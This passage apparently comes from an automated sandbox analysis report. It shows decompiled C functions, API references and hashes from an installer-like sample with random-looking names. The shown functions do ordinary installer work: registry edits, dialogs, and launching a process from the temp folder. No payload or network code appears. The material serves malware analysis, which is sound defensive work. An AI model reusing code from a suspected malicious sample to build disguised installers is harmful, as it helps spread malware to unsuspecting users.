                          0x00402312
                          0x0040231c
                          0x00402322
                          0x0040232c
                          0x00402333
                          0x0040233b
                          0x00402349
                          0x0040234d
                          0x00402358
                          0x00402358
                          0x0040235c
                          0x00402360
                          0x00402366
                          0x0040236b
                          0x0040236b
                          0x0040236f
                          0x0040237b
                          0x0040237b
                          0x00402394
                          0x00402396
                          0x00402396
                          0x00402399
                          0x0040246f
                          0x0040246f
                          0x00402880
                          0x0040288c

                          APIs
                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CloseCreateValuelstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\nsv9D9D.tmp
                          • API String ID: 1356686001-2133834865
                          • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                          • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                          • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403897(void* __ecx, void* __eflags) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed short _t6;
                          				intOrPtr _t11;
                          				signed int _t13;
                          				intOrPtr _t15;
                          				signed int _t16;
                          				signed short* _t18;
                          				signed int _t20;
                          				signed short* _t23;
                          				intOrPtr _t25;
                          				signed int _t26;
                          				intOrPtr* _t27;
                          
                          				_t24 = "1033";
                          				_t13 = 0xffff;
                          				_t6 = E004059FC(__ecx, "1033");
                          				while(1) {
                          					_t26 =  *0x423ee4; // 0x1
                          					if(_t26 == 0) {
                          						goto L7;
                          					}
                          					_t15 =  *0x423eb0; // 0x753e70
                          					_t16 =  *(_t15 + 0x64);
                          					_t20 =  ~_t16;
                          					_t18 = _t16 * _t26 +  *0x423ee0;
                          					while(1) {
                          						_t18 = _t18 + _t20;
                          						_t26 = _t26 - 1;
                          						if((( *_t18 ^ _t6) & _t13) == 0) {
                          							break;
                          						}
                          						if(_t26 != 0) {
                          							continue;
                          						}
                          						goto L7;
                          					}
                          					 *0x423680 = _t18[1];
                          					 *0x423f48 = _t18[3];
                          					_t23 =  &(_t18[5]);
                          					if(_t23 != 0) {
                          						 *0x42367c = _t23;
                          						E004059E3(_t24,  *_t18 & 0x0000ffff);
                          						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "heifsmlbdxlebvytfzg Setup", 0xfffffffe));
                          						_t11 =  *0x423ecc; // 0x1
                          						_t27 =  *0x423ec8; // 0x75401c
                          						if(_t11 == 0) {
                          							L15:
                          							return _t11;
                          						}
                          						_t25 = _t11;
                          						do {
                          							_t11 =  *_t27;
                          							if(_t11 != 0) {
                          								_t5 = _t27 + 0x18; // 0x754034
                          								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
                          							}
                          							_t27 = _t27 + 0x418;
                          							_t25 = _t25 - 1;
                          						} while (_t25 != 0);
                          						goto L15;
                          					}
                          					L7:
                          					if(_t13 != 0xffff) {
                          						_t13 = 0;
                          					} else {
                          						_t13 = 0x3ff;
                          					}
                          				}
                          			}

















                          0x0040389b
                          0x004038a0
                          0x004038a6
                          0x004038ab
                          0x004038ab
                          0x004038b3
                          0x00000000
                          0x00000000
                          0x004038b5
                          0x004038bb
                          0x004038c3
                          0x004038c5
                          0x004038cb
                          0x004038cb
                          0x004038cd
                          0x004038d9
                          0x00000000
                          0x00000000
                          0x004038dd
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004038df
                          0x004038e4
                          0x004038ed
                          0x004038f3
                          0x004038f8
                          0x0040390c
                          0x00403917
                          0x0040392f
                          0x00403935
                          0x0040393a
                          0x00403942
                          0x00403963
                          0x00403963
                          0x00403963
                          0x00403944
                          0x00403946
                          0x00403946
                          0x0040394a
                          0x0040394d
                          0x00403951
                          0x00403951
                          0x00403956
                          0x0040395c
                          0x0040395c
                          0x00000000
                          0x00403946
                          0x004038fa
                          0x004038ff
                          0x00403908
                          0x00403901
                          0x00403901
                          0x00403901
                          0x004038ff

                          APIs
                          • SetWindowTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup), ref: 0040392F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: TextWindow
                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$heifsmlbdxlebvytfzg Setup$p>u
                          • API String ID: 530164218-2496455689
                          • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                          • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                          • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402BC5(intOrPtr _a4) {
                          				char _v68;
                          				long _t6;
                          				struct HWND__* _t7;
                          				struct HWND__* _t14;
                          
                          				if(_a4 != 0) {
                          					_t14 =  *0x417044; // 0x0
                          					if(_t14 != 0) {
                          						_t14 = DestroyWindow(_t14);
                          					}
                          					 *0x417044 = 0;
                          					return _t14;
                          				}
                          				__eflags =  *0x417044; // 0x0
                          				if(__eflags != 0) {
                          					return E00405DDC(0);
                          				}
                          				_t6 = GetTickCount();
                          				__eflags = _t6 -  *0x423eac;
                          				if(_t6 >  *0x423eac) {
                          					__eflags =  *0x423ea8; // 0x0
                          					if(__eflags == 0) {
                          						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                          						 *0x417044 = _t7;
                          						return _t7;
                          					}
                          					__eflags =  *0x423f54 & 0x00000001;
                          					if(( *0x423f54 & 0x00000001) != 0) {
                          						wsprintfA( &_v68, "... %d%%", E00402BA9());
                          						return E00404E23(0,  &_v68);
                          					}
                          				}
                          				return _t6;
                          			}







                          0x00402bd1
                          0x00402bd3
                          0x00402bda
                          0x00402bdd
                          0x00402bdd
                          0x00402be3
                          0x00000000
                          0x00402be3
                          0x00402beb
                          0x00402bf1
                          0x00000000
                          0x00402bf4
                          0x00402bfb
                          0x00402c01
                          0x00402c07
                          0x00402c09
                          0x00402c0f
                          0x00402c4d
                          0x00402c53
                          0x00000000
                          0x00402c53
                          0x00402c11
                          0x00402c18
                          0x00402c29
                          0x00000000
                          0x00402c37
                          0x00402c18
                          0x00402c5a

                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                          • GetTickCount.KERNEL32 ref: 00402BFB
                          • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                            • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,000032D2), ref: 00402BBE
                          • wsprintfA.USER32 ref: 00402C29
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 632923820-2449383134
                          • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                          • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                          • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E00402A28(void* _a4, char* _a8, long _a12) {
                          				void* _v8;
                          				char _v272;
                          				signed char _t16;
                          				long _t18;
                          				long _t25;
                          				intOrPtr* _t27;
                          				long _t28;
                          
                          				_t16 =  *0x423f50; // 0x0
                          				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                          				if(_t18 == 0) {
                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                          						__eflags = _a12;
                          						if(_a12 != 0) {
                          							RegCloseKey(_v8);
                          							L8:
                          							__eflags = 1;
                          							return 1;
                          						}
                          						_t25 = E00402A28(_v8,  &_v272, 0);
                          						__eflags = _t25;
                          						if(_t25 != 0) {
                          							break;
                          						}
                          					}
                          					RegCloseKey(_v8);
                          					_t27 = E00405DA3(2);
                          					if(_t27 == 0) {
                          						__eflags =  *0x423f50; // 0x0
                          						if(__eflags != 0) {
                          							goto L8;
                          						}
                          						_t28 = RegDeleteKeyA(_a4, _a8);
                          						__eflags = _t28;
                          						if(_t28 != 0) {
                          							goto L8;
                          						}
                          						return _t28;
                          					}
                          					return  *_t27(_a4, _a8,  *0x423f50, 0);
                          				}
                          				return _t18;
                          			}










                          0x00402a38
                          0x00402a49
                          0x00402a51
                          0x00402a79
                          0x00402a60
                          0x00402a63
                          0x00402ab3
                          0x00402ab9
                          0x00402abb
                          0x00000000
                          0x00402abb
                          0x00402a70
                          0x00402a75
                          0x00402a77
                          0x00000000
                          0x00000000
                          0x00402a77
                          0x00402a8e
                          0x00402a96
                          0x00402a9d
                          0x00402ac3
                          0x00402ac9
                          0x00000000
                          0x00000000
                          0x00402ad1
                          0x00402ad7
                          0x00402ad9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402ad9
                          0x00000000
                          0x00402aac
                          0x00402ac0

                          APIs
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                          • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                          • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Close$DeleteEnumOpen
                          • String ID:
                          • API String ID: 1912718029-0
                          • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                          • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                          • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00401CC1(int __edx) {
                          				void* _t17;
                          				struct HINSTANCE__* _t21;
                          				struct HWND__* _t25;
                          				void* _t27;
                          
                          				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                          				GetClientRect(_t25, _t27 - 0x40);
                          				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                          				if(_t17 != _t21) {
                          					DeleteObject(_t17);
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
                          				return 0;
                          			}







                          0x00401ccb
                          0x00401cd2
                          0x00401d01
                          0x00401d09
                          0x00401d10
                          0x00401d10
                          0x00402880
                          0x0040288c

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                          • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                          • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
                          				char _v36;
                          				char _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t26;
                          				void* _t34;
                          				signed int _t36;
                          				signed int _t39;
                          				unsigned int _t46;
                          
                          				_t46 = _a12;
                          				_push(0x14);
                          				_pop(0);
                          				_t34 = 0xffffffdc;
                          				if(_t46 < 0x100000) {
                          					_push(0xa);
                          					_pop(0);
                          					_t34 = 0xffffffdd;
                          				}
                          				if(_t46 < 0x400) {
                          					_t34 = 0xffffffde;
                          				}
                          				if(_t46 < 0xffff3333) {
                          					_t39 = 0x14;
                          					asm("cdq");
                          					_t46 = _t46 + 1 / _t39;
                          				}
                          				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
                          				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
                          				_t21 = _t46 & 0x00ffffff;
                          				_t36 = 0xa;
                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                          				_push(_t46 >> 0);
                          				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
                          				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
                          				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
                          			}













                          0x00404618
                          0x0040461c
                          0x00404624
                          0x00404627
                          0x00404628
                          0x0040462a
                          0x0040462c
                          0x0040462f
                          0x0040462f
                          0x00404636
                          0x0040463c
                          0x0040463c
                          0x00404643
                          0x0040464e
                          0x0040464f
                          0x00404652
                          0x00404652
                          0x0040465f
                          0x0040466a
                          0x0040466d
                          0x0040467f
                          0x00404686
                          0x00404687
                          0x00404696
                          0x004046a6
                          0x004046c2

                          APIs
                          • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                          • wsprintfA.USER32 ref: 004046A6
                          • SetDlgItemTextA.USER32 ref: 004046B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                          • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                          • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E00401BAD() {
                          				signed int _t28;
                          				CHAR* _t31;
                          				long _t32;
                          				int _t37;
                          				signed int _t38;
                          				int _t42;
                          				int _t48;
                          				struct HWND__* _t52;
                          				void* _t55;
                          
                          				 *(_t55 - 0x34) = E004029CB(3);
                          				 *(_t55 + 8) = E004029CB(4);
                          				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                          					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
                          				}
                          				__eflags =  *(_t55 - 0x10) & 0x00000002;
                          				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                          					 *(_t55 + 8) = E004029E8(0x44);
                          				}
                          				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                          				_push(1);
                          				if(__eflags != 0) {
                          					_t50 = E004029E8();
                          					_t28 = E004029E8();
                          					asm("sbb ecx, ecx");
                          					asm("sbb eax, eax");
                          					_t31 =  ~( *_t27) & _t50;
                          					__eflags = _t31;
                          					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                          					goto L10;
                          				} else {
                          					_t52 = E004029CB();
                          					_t37 = E004029CB();
                          					_t48 =  *(_t55 - 0x10) >> 2;
                          					if(__eflags == 0) {
                          						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                          						L10:
                          						 *(_t55 - 8) = _t32;
                          					} else {
                          						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
                          						asm("sbb eax, eax");
                          						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                          					}
                          				}
                          				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
                          				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
                          					_push( *(_t55 - 8));
                          					E004059E3();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
                          				return 0;
                          			}












                          0x00401bb6
                          0x00401bc2
                          0x00401bc5
                          0x00401bce
                          0x00401bce
                          0x00401bd1
                          0x00401bd5
                          0x00401bde
                          0x00401bde
                          0x00401be1
                          0x00401be5
                          0x00401be7
                          0x00401c34
                          0x00401c36
                          0x00401c3f
                          0x00401c47
                          0x00401c4a
                          0x00401c4a
                          0x00401c53
                          0x00000000
                          0x00401be9
                          0x00401bf0
                          0x00401bf2
                          0x00401bfa
                          0x00401bfd
                          0x00401c25
                          0x00401c59
                          0x00401c59
                          0x00401bff
                          0x00401c0d
                          0x00401c15
                          0x00401c18
                          0x00401c18
                          0x00401bfd
                          0x00401c5c
                          0x00401c5f
                          0x00401c65
                          0x00402825
                          0x00402825
                          0x00402880
                          0x0040288c

                          APIs
                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                          • SendMessageA.USER32 ref: 00401C25
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                          • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                          • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004052E5(CHAR* _a4) {
                          				struct _PROCESS_INFORMATION _v20;
                          				int _t7;
                          
                          				0x4224a0->cb = 0x44;
                          				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
                          				if(_t7 != 0) {
                          					CloseHandle(_v20.hThread);
                          					return _v20.hProcess;
                          				}
                          				return _t7;
                          			}





                          0x004052ee
                          0x0040530a
                          0x00405312
                          0x00405317
                          0x00000000
                          0x0040531d
                          0x00405321

                          APIs
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                          • CloseHandle.KERNEL32(?), ref: 00405317
                          Strings
                          • Error launching installer, xrefs: 004052F8
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CloseCreateHandleProcess
                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                          • API String ID: 3712363035-1785902839
                          • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                          • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                          • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405578(CHAR* _a4) {
                          				CHAR* _t7;
                          
                          				_t7 = _a4;
                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                          					lstrcatA(_t7, 0x40900c);
                          				}
                          				return _t7;
                          			}




                          0x00405579
                          0x00405590
                          0x00405598
                          0x00405598
                          0x004055a0

                          APIs
                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                          • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3081826266
                          • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                          • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                          • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
